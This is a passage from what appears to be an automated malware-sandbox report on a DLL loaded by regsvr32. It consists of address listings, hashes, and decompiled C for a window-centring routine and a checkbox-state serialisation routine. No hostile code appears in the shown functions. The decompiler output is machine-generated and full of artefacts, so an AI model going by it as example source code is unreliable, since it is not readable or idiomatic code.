                                                                                                                0x10037c3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037acd
                                                                                                                0x10037ac4
                                                                                                                0x10037abb
                                                                                                                0x10037ab2
                                                                                                                0x00000000
                                                                                                                0x10037a1c
                                                                                                                0x10037a1d
                                                                                                                0x10037a1d
                                                                                                                0x10037a1e
                                                                                                                0x10037a4a
                                                                                                                0x10037a4e
                                                                                                                0x10037a53
                                                                                                                0x10037a5a
                                                                                                                0x10037a60
                                                                                                                0x10037a60
                                                                                                                0x10037a64
                                                                                                                0x10037a68
                                                                                                                0x10037a6e
                                                                                                                0x10037a6e
                                                                                                                0x10037a72
                                                                                                                0x00000000
                                                                                                                0x10037a78
                                                                                                                0x10037a78
                                                                                                                0x10037a7f
                                                                                                                0x10037a84
                                                                                                                0x10037a86
                                                                                                                0x00000000
                                                                                                                0x10037a88
                                                                                                                0x10037a88
                                                                                                                0x10037a8b
                                                                                                                0x10037a8d
                                                                                                                0x00000000
                                                                                                                0x10037a8f
                                                                                                                0x10037a90
                                                                                                                0x10037a92
                                                                                                                0x10037d4e
                                                                                                                0x10037d4e
                                                                                                                0x10037d4e
                                                                                                                0x10037a8d
                                                                                                                0x00000000
                                                                                                                0x10037a86
                                                                                                                0x10037a6a
                                                                                                                0x10037a6a
                                                                                                                0x10037a6c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a6c
                                                                                                                0x10037a5c
                                                                                                                0x10037a5c
                                                                                                                0x10037a5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a5e
                                                                                                                0x10037a20
                                                                                                                0x10037a20
                                                                                                                0x10037a23
                                                                                                                0x10037ad3
                                                                                                                0x10037ad3
                                                                                                                0x10037ad6
                                                                                                                0x10037adc
                                                                                                                0x10037ae4
                                                                                                                0x10037aea
                                                                                                                0x10037aec
                                                                                                                0x10037aef
                                                                                                                0x10037afa
                                                                                                                0x10037aff
                                                                                                                0x10037b02
                                                                                                                0x10037b0d
                                                                                                                0x10037b12
                                                                                                                0x10037b12
                                                                                                                0x10037b02
                                                                                                                0x10037aef
                                                                                                                0x10037b13
                                                                                                                0x10037b1c
                                                                                                                0x10037b1e
                                                                                                                0x10037b20
                                                                                                                0x10037b34
                                                                                                                0x10037b3a
                                                                                                                0x10037b3e
                                                                                                                0x10037b40
                                                                                                                0x10037b42
                                                                                                                0x10037b53
                                                                                                                0x10037b53
                                                                                                                0x10037b42
                                                                                                                0x10037b58
                                                                                                                0x10037a29
                                                                                                                0x10037a29
                                                                                                                0x10037a2c
                                                                                                                0x10037a3f
                                                                                                                0x10037a3f
                                                                                                                0x10037a44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a2e
                                                                                                                0x10037a30
                                                                                                                0x10037a36
                                                                                                                0x10037a39
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a39
                                                                                                                0x10037a2c
                                                                                                                0x10037a23
                                                                                                                0x10037a1e
                                                                                                                0x10037951
                                                                                                                0x10037957
                                                                                                                0x10037959
                                                                                                                0x10037959
                                                                                                                0x1003795d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037965
                                                                                                                0x1003796a
                                                                                                                0x1003796d
                                                                                                                0x1003797a
                                                                                                                0x1003797c
                                                                                                                0x1003797e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003797e
                                                                                                                0x00000000
                                                                                                                0x1003796d
                                                                                                                0x10037980
                                                                                                                0x10037982
                                                                                                                0x100379a7
                                                                                                                0x100379a7
                                                                                                                0x100379ae
                                                                                                                0x100379be
                                                                                                                0x100379be
                                                                                                                0x100379c0
                                                                                                                0x00000000
                                                                                                                0x100379c2
                                                                                                                0x100379c2
                                                                                                                0x100379c5
                                                                                                                0x100379c7
                                                                                                                0x00000000
                                                                                                                0x100379c9
                                                                                                                0x100379cc
                                                                                                                0x100379d0
                                                                                                                0x100379d4
                                                                                                                0x100379df
                                                                                                                0x100379df
                                                                                                                0x100379e3
                                                                                                                0x00000000
                                                                                                                0x100379e5
                                                                                                                0x100379e5
                                                                                                                0x100379ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100379ec
                                                                                                                0x100379d6
                                                                                                                0x100379d6
                                                                                                                0x100379dd
                                                                                                                0x100379ee
                                                                                                                0x100379ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100379dd
                                                                                                                0x100379d4
                                                                                                                0x100379c7
                                                                                                                0x100379b0
                                                                                                                0x100379b0
                                                                                                                0x100379b3
                                                                                                                0x00000000
                                                                                                                0x100379b5
                                                                                                                0x100379b5
                                                                                                                0x100379bc
                                                                                                                0x100379f5
                                                                                                                0x100379f5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100379bc
                                                                                                                0x100379b3
                                                                                                                0x10037984
                                                                                                                0x10037984
                                                                                                                0x10037987
                                                                                                                0x10037989
                                                                                                                0x00000000
                                                                                                                0x1003798b
                                                                                                                0x1003798b
                                                                                                                0x1003798f
                                                                                                                0x00000000
                                                                                                                0x10037991
                                                                                                                0x10037991
                                                                                                                0x10037997
                                                                                                                0x1003799a
                                                                                                                0x1003799d
                                                                                                                0x1003799f
                                                                                                                0x00000000
                                                                                                                0x100379a1
                                                                                                                0x100379a1
                                                                                                                0x100379a1
                                                                                                                0x1003799f
                                                                                                                0x1003798f
                                                                                                                0x10037989
                                                                                                                0x10037982
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037938
                                                                                                                0x10037b60
                                                                                                                0x100378bc
                                                                                                                0x100378bc
                                                                                                                0x100378c1
                                                                                                                0x100378c4
                                                                                                                0x100378c9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100378c9
                                                                                                                0x10037896
                                                                                                                0x10037896
                                                                                                                0x1003789b
                                                                                                                0x100378a2
                                                                                                                0x1003789d
                                                                                                                0x1003789d
                                                                                                                0x1003789d
                                                                                                                0x100378a6
                                                                                                                0x00000000
                                                                                                                0x100378a8
                                                                                                                0x100378b1
                                                                                                                0x100378cb
                                                                                                                0x100378cb
                                                                                                                0x100378ce
                                                                                                                0x00000000
                                                                                                                0x100378d0
                                                                                                                0x100378d0
                                                                                                                0x100378d3
                                                                                                                0x100378d5
                                                                                                                0x100378d5
                                                                                                                0x100378d8
                                                                                                                0x100378d9
                                                                                                                0x100378df
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100378df
                                                                                                                0x100378b3
                                                                                                                0x100378b3
                                                                                                                0x100378b3
                                                                                                                0x100378e3
                                                                                                                0x100378e7
                                                                                                                0x100378e7
                                                                                                                0x100378b1
                                                                                                                0x100378a6
                                                                                                                0x10037882
                                                                                                                0x10037882
                                                                                                                0x1003788c
                                                                                                                0x10037890
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037890
                                                                                                                0x00000000
                                                                                                                0x10037880
                                                                                                                0x100378e1
                                                                                                                0x100378e1
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 656273425-0
                                                                                                                • Opcode ID: 2efc149a44e08410695b2123a15573a385b54c10866b613c06230b10019cb53b
                                                                                                                • Instruction ID: e5e9ede085d456cabbb09e6b8975b7e97edbb018c7e102b9f1eac511fcbcea72
                                                                                                                • Opcode Fuzzy Hash: 2efc149a44e08410695b2123a15573a385b54c10866b613c06230b10019cb53b
                                                                                                                • Instruction Fuzzy Hash: CBF1AD359006069FDF72DB65C884BAE77F6FF44292F11402AE849AF161DB30ED80DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100195F7 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E100195F7(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1001D23C(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1001764E(_t121, E100175E3(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10004700();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1001764E(_t121, E100175E3(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001D569(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                                0x100195f7
                                                                                                                0x100195f7
                                                                                                                0x100195fe
                                                                                                                0x10019601
                                                                                                                0x10019609
                                                                                                                0x1001960c
                                                                                                                0x10019611
                                                                                                                0x1001961f
                                                                                                                0x10019631
                                                                                                                0x10019621
                                                                                                                0x10019624
                                                                                                                0x10019624
                                                                                                                0x10019637
                                                                                                                0x1001963b
                                                                                                                0x10019647
                                                                                                                0x1001964f
                                                                                                                0x10019651
                                                                                                                0x10019651
                                                                                                                0x1001964f
                                                                                                                0x10019613
                                                                                                                0x10019613
                                                                                                                0x10019613
                                                                                                                0x10019613
                                                                                                                0x10019653
                                                                                                                0x10019661
                                                                                                                0x1001966a
                                                                                                                0x1001970a
                                                                                                                0x10019711
                                                                                                                0x10019718
                                                                                                                0x10019722
                                                                                                                0x10019670
                                                                                                                0x10019672
                                                                                                                0x10019677
                                                                                                                0x10019682
                                                                                                                0x1001968b
                                                                                                                0x1001968b
                                                                                                                0x10019682
                                                                                                                0x1001968f
                                                                                                                0x10019696
                                                                                                                0x100196d7
                                                                                                                0x100196e6
                                                                                                                0x100196f3
                                                                                                                0x10019698
                                                                                                                0x10019698
                                                                                                                0x1001969f
                                                                                                                0x100196a1
                                                                                                                0x100196a1
                                                                                                                0x100196b1
                                                                                                                0x100196c4
                                                                                                                0x100196ce
                                                                                                                0x100196ce
                                                                                                                0x10019696
                                                                                                                0x10019731
                                                                                                                0x10019736
                                                                                                                0x1001973b
                                                                                                                0x1001973f
                                                                                                                0x10019742
                                                                                                                0x10019749
                                                                                                                0x10019751
                                                                                                                0x10019759
                                                                                                                0x10019761
                                                                                                                0x10019768
                                                                                                                0x1001976d
                                                                                                                0x10019779
                                                                                                                0x10019781
                                                                                                                0x10019781
                                                                                                                0x1001976f
                                                                                                                0x1001976f
                                                                                                                0x1001976f
                                                                                                                0x10019787
                                                                                                                0x10019796
                                                                                                                0x1001979e
                                                                                                                0x1001979e
                                                                                                                0x10019789
                                                                                                                0x10019789
                                                                                                                0x10019789
                                                                                                                0x100197b6

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                • GetParent.USER32(?), ref: 10019624
                                                                                                                • SendMessageA.USER32 ref: 10019647
                                                                                                                • GetWindowRect.USER32 ref: 10019661
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10019677
                                                                                                                • CopyRect.USER32(?,?), ref: 100196C4
                                                                                                                • CopyRect.USER32(?,?), ref: 100196CE
                                                                                                                • GetWindowRect.USER32 ref: 100196D7
                                                                                                                • CopyRect.USER32(?,?), ref: 100196F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                • String ID: (
                                                                                                                • API String ID: 808654186-3887548279
                                                                                                                • Opcode ID: a1559d798ecd20525637dee0591de1d651f6c6f6fac8c7d742a1c1caf6dcb4d9
                                                                                                                • Instruction ID: 18c05ec1aa8623333a2e9570bca1fe911905b7c065a13fcb4f8d2d905a529139
                                                                                                                • Opcode Fuzzy Hash: a1559d798ecd20525637dee0591de1d651f6c6f6fac8c7d742a1c1caf6dcb4d9
                                                                                                                • Instruction Fuzzy Hash: 69515D76900619ABDB00DFA8DC85EEEBBB9FF48350F154215F905FB295DB30E9818B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10013B70 Relevance: 24.4, APIs: 16, Instructions: 364windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10013B70(void* __ebx, void* __ecx, long _a4) {
				long _v4;
				long _v8;
				long _v12;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t138;
				int* _t139;
				int* _t140;
				int* _t144;
				int* _t145;
				int* _t149;
				int* _t150;
				int* _t154;
				int* _t155;
				int* _t159;
				int* _t160;
				int* _t164;
				int* _t165;
				long _t169;
				long _t171;
				long _t208;
				signed char _t210;
				signed char _t215;
				int* _t219;
				int _t234;
				intOrPtr _t239;
				intOrPtr _t241;
				intOrPtr _t243;
				intOrPtr _t245;
				intOrPtr _t247;
				intOrPtr _t249;
				signed char _t271;
				signed char _t277;
				void* _t287;
				signed char _t298;
				signed char _t306;
				void* _t311;
				int _t312;
				long _t313;

				_t233 = __ebx;
				_t313 = _a4;
				_t138 =  *(_t313 + 0x18);
				_t311 = __ecx;
				if(( !_t138 & 0x00000001) == 0) {
					__eflags = _t138 & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t313 + 0x14)));
						_push(4);
						E10020287(__ebx, _t287, __ecx, _t313, __eflags);
					}
					_t139 =  *(_t313 + 0x28);
					_t239 =  *((intOrPtr*)(_t313 + 0x2c));
					_t288 =  &(_t139[1]);
					__eflags =  &(_t139[1]) - _t239;
					if( &(_t139[1]) > _t239) {
						__eflags = _t139 - _t239 + 4;
						E1001FADC(_t313, _t288, _t139 - _t239 + 4);
					}
					_t140 =  *(_t313 + 0x28);
					 *(_t313 + 0x28) =  &(_t140[1]);
					SendMessageA( *(_t311 + 0x24c), 0xf1,  *_t140, 0);
					__eflags =  *(_t313 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t313 + 0x14)));
						_push(4);
						E10020287(_t233, _t288, _t311, _t313, __eflags);
					}
					_t144 =  *(_t313 + 0x28);
					_t241 =  *((intOrPtr*)(_t313 + 0x2c));
					_t289 =  &(_t144[1]);
					__eflags =  &(_t144[1]) - _t241;
					if( &(_t144[1]) > _t241) {
						__eflags = _t144 - _t241 + 4;
						E1001FADC(_t313, _t289, _t144 - _t241 + 4);
					}
					_t145 =  *(_t313 + 0x28);
					 *(_t313 + 0x28) =  &(_t145[1]);
					SendMessageA( *(_t311 + 0x1f8), 0xf1,  *_t145, 0);
					__eflags =  *(_t313 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t313 + 0x14)));
						_push(4);
						E10020287(_t233, _t289, _t311, _t313, __eflags);
					}
					_t149 =  *(_t313 + 0x28);
					_t243 =  *((intOrPtr*)(_t313 + 0x2c));
					_t290 =  &(_t149[1]);
					__eflags =  &(_t149[1]) - _t243;
					if( &(_t149[1]) > _t243) {
						__eflags = _t149 - _t243 + 4;
						E1001FADC(_t313, _t290, _t149 - _t243 + 4);
					}
					_t150 =  *(_t313 + 0x28);
					 *(_t313 + 0x28) =  &(_t150[1]);
					SendMessageA( *(_t311 + 0x1a4), 0xf1,  *_t150, 0);
					__eflags =  *(_t313 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t313 + 0x14)));
						_push(4);
						E10020287(_t233, _t290, _t311, _t313, __eflags);
					}
					_t154 =  *(_t313 + 0x28);
					_t245 =  *((intOrPtr*)(_t313 + 0x2c));
					_t291 =  &(_t154[1]);
					__eflags =  &(_t154[1]) - _t245;
					if( &(_t154[1]) > _t245) {
						__eflags = _t154 - _t245 + 4;
						E1001FADC(_t313, _t291, _t154 - _t245 + 4);
					}
					_t155 =  *(_t313 + 0x28);
					 *(_t313 + 0x28) =  &(_t155[1]);
					SendMessageA( *(_t311 + 0x150), 0xf1,  *_t155, 0);
					__eflags =  *(_t313 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t313 + 0x14)));
						_push(4);
						E10020287(_t233, _t291, _t311, _t313, __eflags);
					}
					_t159 =  *(_t313 + 0x28);
					_t247 =  *((intOrPtr*)(_t313 + 0x2c));
					_t292 =  &(_t159[1]);
					__eflags =  &(_t159[1]) - _t247;
					if( &(_t159[1]) > _t247) {
						__eflags = _t159 - _t247 + 4;
						E1001FADC(_t313, _t292, _t159 - _t247 + 4);
					}
					_t160 =  *(_t313 + 0x28);
					 *(_t313 + 0x28) =  &(_t160[1]);
					SendMessageA( *(_t311 + 0xfc), 0xf1,  *_t160, 0);
					__eflags =  *(_t313 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t313 + 0x14)));
						_push(4);
						E10020287(_t233, _t292, _t311, _t313, __eflags);
					}
					_t164 =  *(_t313 + 0x28);
					_t249 =  *((intOrPtr*)(_t313 + 0x2c));
					_t293 =  &(_t164[1]);
					__eflags =  &(_t164[1]) - _t249;
					if( &(_t164[1]) > _t249) {
						__eflags = _t164 - _t249 + 4;
						E1001FADC(_t313, _t293, _t164 - _t249 + 4);
					}
					_t165 =  *(_t313 + 0x28);
					 *(_t313 + 0x28) =  &(_t165[1]);
					SendMessageA( *(_t311 + 0xa8), 0xf1,  *_t165, 0);
					_t169 = SendMessageA( *(_t311 + 0xfc), 0xf0, 0, 0);
					__eflags = _t169;
					if(_t169 != 0) {
						E1001D39A(_t311 + 0x88, 0);
						SendMessageA( *(_t311 + 0xa8), 0xf1, 0, 0);
					}
					_t171 = SendMessageA( *(_t311 + 0xa8), 0xf0, 0, 0);
					__eflags = _t171;
					if(_t171 == 0) {
						return _t171;
					} else {
						E1001D39A(_t311 + 0xdc, 0);
						return SendMessageA( *(_t311 + 0xfc), 0xf1, 0, 0);
					}
				}
				_push(__ebx);
				_v4 = SendMessageA( *(__ecx + 0xa8), 0xf0, 0, 0);
				_v8 = SendMessageA( *(_t311 + 0xfc), 0xf0, 0, 0);
				_v12 = SendMessageA( *(_t311 + 0x150), 0xf0, 0, 0);
				_a4 = SendMessageA( *(_t311 + 0x1a4), 0xf0, 0, 0);
				_t234 = SendMessageA( *(_t311 + 0x1f8), 0xf0, 0, 0);
				_t208 = SendMessageA( *(_t311 + 0x24c), 0xf0, 0, 0);
				_t298 =  !( *(_t313 + 0x18));
				_t319 = _t298 & 0x00000001;
				_t312 = _t208;
				if((_t298 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t313 + 0x14)));
					_push(2);
					E10020287(_t234, _t298, _t312, _t313, _t319);
				}
				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
					E1001FA65(_t313);
				}
				_t299 =  *(_t313 + 0x28);
				 *( *(_t313 + 0x28)) = _t312;
				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
				_t210 =  !( *(_t313 + 0x18));
				_t321 = _t210 & 0x00000001;
				if((_t210 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t313 + 0x14)));
					_push(2);
					E10020287(_t234, _t299, _t312, _t313, _t321);
				}
				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
					E1001FA65(_t313);
				}
				 *( *(_t313 + 0x28)) = _t234;
				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
				_t271 =  !( *(_t313 + 0x18));
				_t323 = _t271 & 0x00000001;
				if((_t271 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t313 + 0x14)));
					_push(2);
					E10020287(_t234,  *((intOrPtr*)(_t313 + 0x14)), _t312, _t313, _t323);
				}
				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
					E1001FA65(_t313);
				}
				_t302 = _a4;
				 *( *(_t313 + 0x28)) = _a4;
				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
				_t215 =  !( *(_t313 + 0x18));
				_t325 = _t215 & 0x00000001;
				if((_t215 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t313 + 0x14)));
					_push(2);
					E10020287(_t234, _t302, _t312, _t313, _t325);
				}
				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
					E1001FA65(_t313);
				}
				 *( *(_t313 + 0x28)) = _v12;
				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
				_t306 =  !( *(_t313 + 0x18));
				_t327 = _t306 & 0x00000001;
				if((_t306 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t313 + 0x14)));
					_push(2);
					E10020287(_t234, _t306, _t312, _t313, _t327);
				}
				if( &(( *(_t313 + 0x28))[1]) >  *((intOrPtr*)(_t313 + 0x2c))) {
					E1001FA65(_t313);
				}
				 *( *(_t313 + 0x28)) = _v8;
				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
				_t277 =  !( *(_t313 + 0x18));
				_t329 = _t277 & 0x00000001;
				if((_t277 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t313 + 0x14)));
					_push(2);
					E10020287(_t234,  *((intOrPtr*)(_t313 + 0x14)), _t312, _t313, _t329);
				}
				_t219 =  &(( *(_t313 + 0x28))[1]);
				if(_t219 >  *((intOrPtr*)(_t313 + 0x2c))) {
					_t219 = E1001FA65(_t313);
				}
				 *( *(_t313 + 0x28)) = _v4;
				 *(_t313 + 0x28) =  &(( *(_t313 + 0x28))[1]);
				return _t219;
			}











































                                                                                                                0x10013b70
                                                                                                                0x10013b75
                                                                                                                0x10013b79
                                                                                                                0x10013b7d
                                                                                                                0x10013b86
                                                                                                                0x10013d44
                                                                                                                0x10013d46
                                                                                                                0x10013d4b
                                                                                                                0x10013d4c
                                                                                                                0x10013d4e
                                                                                                                0x10013d4e
                                                                                                                0x10013d53
                                                                                                                0x10013d56
                                                                                                                0x10013d59
                                                                                                                0x10013d5c
                                                                                                                0x10013d5e
                                                                                                                0x10013d62
                                                                                                                0x10013d68
                                                                                                                0x10013d68
                                                                                                                0x10013d6d
                                                                                                                0x10013d7e
                                                                                                                0x10013d8d
                                                                                                                0x10013d8f
                                                                                                                0x10013d93
                                                                                                                0x10013d98
                                                                                                                0x10013d99
                                                                                                                0x10013d9b
                                                                                                                0x10013d9b
                                                                                                                0x10013da0
                                                                                                                0x10013da3
                                                                                                                0x10013da6
                                                                                                                0x10013da9
                                                                                                                0x10013dab
                                                                                                                0x10013daf
                                                                                                                0x10013db5
                                                                                                                0x10013db5
                                                                                                                0x10013dba
                                                                                                                0x10013dc5
                                                                                                                0x10013dd4
                                                                                                                0x10013dd6
                                                                                                                0x10013dda
                                                                                                                0x10013ddf
                                                                                                                0x10013de0
                                                                                                                0x10013de2
                                                                                                                0x10013de2
                                                                                                                0x10013de7
                                                                                                                0x10013dea
                                                                                                                0x10013ded
                                                                                                                0x10013df0
                                                                                                                0x10013df2
                                                                                                                0x10013df6
                                                                                                                0x10013dfc
                                                                                                                0x10013dfc
                                                                                                                0x10013e01
                                                                                                                0x10013e0c
                                                                                                                0x10013e1b
                                                                                                                0x10013e1d
                                                                                                                0x10013e21
                                                                                                                0x10013e26
                                                                                                                0x10013e27
                                                                                                                0x10013e29
                                                                                                                0x10013e29
                                                                                                                0x10013e2e
                                                                                                                0x10013e31
                                                                                                                0x10013e34
                                                                                                                0x10013e37
                                                                                                                0x10013e39
                                                                                                                0x10013e3d
                                                                                                                0x10013e43
                                                                                                                0x10013e43
                                                                                                                0x10013e48
                                                                                                                0x10013e53
                                                                                                                0x10013e62
                                                                                                                0x10013e64
                                                                                                                0x10013e68
                                                                                                                0x10013e6d
                                                                                                                0x10013e6e
                                                                                                                0x10013e70
                                                                                                                0x10013e70
                                                                                                                0x10013e75
                                                                                                                0x10013e78
                                                                                                                0x10013e7b
                                                                                                                0x10013e7e
                                                                                                                0x10013e80
                                                                                                                0x10013e84
                                                                                                                0x10013e8a
                                                                                                                0x10013e8a
                                                                                                                0x10013e8f
                                                                                                                0x10013e9a
                                                                                                                0x10013ea9
                                                                                                                0x10013eab
                                                                                                                0x10013eaf
                                                                                                                0x10013eb4
                                                                                                                0x10013eb5
                                                                                                                0x10013eb7
                                                                                                                0x10013eb7
                                                                                                                0x10013ebc
                                                                                                                0x10013ebf
                                                                                                                0x10013ec2
                                                                                                                0x10013ec5
                                                                                                                0x10013ec7
                                                                                                                0x10013ecb
                                                                                                                0x10013ed1
                                                                                                                0x10013ed1
                                                                                                                0x10013ed6
                                                                                                                0x10013ee1
                                                                                                                0x10013ef0
                                                                                                                0x10013f02
                                                                                                                0x10013f04
                                                                                                                0x10013f06
                                                                                                                0x10013f10
                                                                                                                0x10013f25
                                                                                                                0x10013f25
                                                                                                                0x10013f37
                                                                                                                0x10013f39
                                                                                                                0x10013f3b
                                                                                                                0x10013d41
                                                                                                                0x10013f41
                                                                                                                0x10013f49
                                                                                                                0x10013f66
                                                                                                                0x10013f66
                                                                                                                0x10013f3b
                                                                                                                0x10013b98
                                                                                                                0x10013ba9
                                                                                                                0x10013bcb
                                                                                                                0x10013be1
                                                                                                                0x10013beb
                                                                                                                0x10013c0d
                                                                                                                0x10013c0f
                                                                                                                0x10013c14
                                                                                                                0x10013c16
                                                                                                                0x10013c19
                                                                                                                0x10013c1b
                                                                                                                0x10013c20
                                                                                                                0x10013c21
                                                                                                                0x10013c23
                                                                                                                0x10013c23
